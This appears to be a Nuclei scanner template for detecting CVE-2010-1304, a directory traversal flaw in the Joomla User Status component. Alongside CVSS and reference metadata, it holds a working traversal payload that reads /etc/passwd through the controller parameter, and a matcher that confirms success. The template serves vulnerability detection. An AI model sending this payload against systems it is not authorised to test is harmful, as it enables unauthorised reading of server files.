id: CVE-2010-1304 info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11998 - https://nvd.nist.gov/vuln/detail/CVE-2010-1304 - http://www.exploit-db.com/exploits/11998 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.0045 epss-percentile: 0.72276 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamo product: com_userstatus tags: cve2010,joomla,lfi,status,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100aa6b3d60cedc7d1ca0758310228de0548a15ac56f10ff81f2f201fbf1eed7cd902205bdd3a411a18f3ad920145a68dd6f63cd5c5d4e1b5cd2eb8a6a0eea5e704e82f:922c64590222798bb761d5b6d8e72950